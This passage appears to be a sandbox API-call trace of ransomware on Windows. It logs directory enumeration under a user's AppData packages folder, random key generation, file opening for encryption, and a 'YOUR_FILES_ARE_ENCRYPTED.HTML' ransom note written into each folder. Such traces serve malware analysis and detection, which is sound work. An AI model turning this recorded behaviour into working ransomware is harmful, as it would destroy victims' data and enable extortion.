(lpFirst="Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.655] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe") returned 136 [0115.655] GetProcessHeap () returned 0x600000 [0115.655] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.655] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe" [0115.655] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\*" [0115.655] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15621741, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x15621741, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x15621741, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0115.655] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15621741, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x15621741, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x15621741, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 1 [0115.655] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15621741, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x15621741, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x158f63a2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0115.655] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.655] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 152 [0115.656] GetProcessHeap () returned 0x600000 [0115.656] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.657] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore" [0115.657] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0115.657] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15621741, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x158f63a2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x158f63a2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1478, dwReserved1=0x62f200, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.657] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15621741, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x158f63a2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x158f63a2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1478, dwReserved1=0x62f200, cFileName="..", cAlternateFileName="")) returned 1 [0115.657] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15621741, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x67d8a738, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x1614e61b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x6f1478, dwReserved1=0x62f200, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0115.657] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.657] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 172 [0115.657] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.657] lstrlenW (lpString=".dat") returned 4 [0115.657] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.657] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0115.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\microsoft.commsphone_1.10.15000.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0115.659] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=65536) returned 1 [0115.659] GetProcessHeap () returned 0x600000 [0115.659] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0115.662] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="44") returned 2 [0115.662] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="E8") returned 2 [0115.662] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="11") returned 2 [0115.662] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="67") returned 2 [0115.662] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="DE") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="99") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="5C") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="B5") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="EC") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="E0") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="00") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="02") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="54") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="73") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="86") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="6C") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="A3") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="2C") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="AA") returned 2 [0115.662] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="00") returned 2 [0115.662] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="E4") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="8C") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="99") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="2A") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="33") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="10") returned 2 [0115.662] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="94") returned 2 [0115.662] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="2C") returned 2 [0115.663] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="8A") returned 2 [0115.663] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="29") returned 2 [0115.663] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="7A") returned 2 [0115.663] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="3B") returned 2 [0115.663] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0115.663] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.663] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0115.663] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x158115d2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x158115d2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x158115d2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x6f1478, dwReserved1=0x62f200, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0115.663] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.663] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 177 [0115.663] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.663] lstrlenW (lpString=".LOG1") returned 5 [0115.664] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.664] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x158115d2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x158115d2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x158115d2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1478, dwReserved1=0x62f200, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0115.664] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.664] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 177 [0115.664] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.664] lstrlenW (lpString=".LOG2") returned 5 [0115.664] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.664] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x158115d2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x158115d2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x158115d2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1478, dwReserved1=0x62f200, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0115.664] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.664] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 182 [0115.664] GetProcessHeap () returned 0x600000 [0115.664] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\microsoft.commsphone_1.10.15000.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.665] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.667] CloseHandle (hObject=0x324) returned 1 [0115.667] GetProcessHeap () returned 0x600000 [0115.667] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.668] GetProcessHeap () returned 0x600000 [0115.668] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.668] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15621741, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x15621741, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x158f63a2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0115.668] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0115.668] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 166 [0115.668] GetProcessHeap () returned 0x600000 [0115.668] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\microsoft.commsphone_1.10.15000.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.675] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.676] CloseHandle (hObject=0x214) returned 1 [0115.676] GetProcessHeap () returned 0x600000 [0115.676] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.676] GetProcessHeap () returned 0x600000 [0115.676] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.677] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x131531fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0115.677] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.677] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\RoamingState") returned 96 [0115.677] GetProcessHeap () returned 0x600000 [0115.677] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.678] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\RoamingState" [0115.678] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\RoamingState\\*" [0115.678] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x131531fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.678] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x131531fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 1 [0115.678] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x131531fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 0 [0115.678] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.678] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0115.678] GetProcessHeap () returned 0x600000 [0115.678] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.679] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.680] CloseHandle (hObject=0x214) returned 1 [0115.680] GetProcessHeap () returned 0x600000 [0115.680] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.680] GetProcessHeap () returned 0x600000 [0115.680] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.680] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1325e11e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1331ced9, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1d30080b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0115.681] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.681] 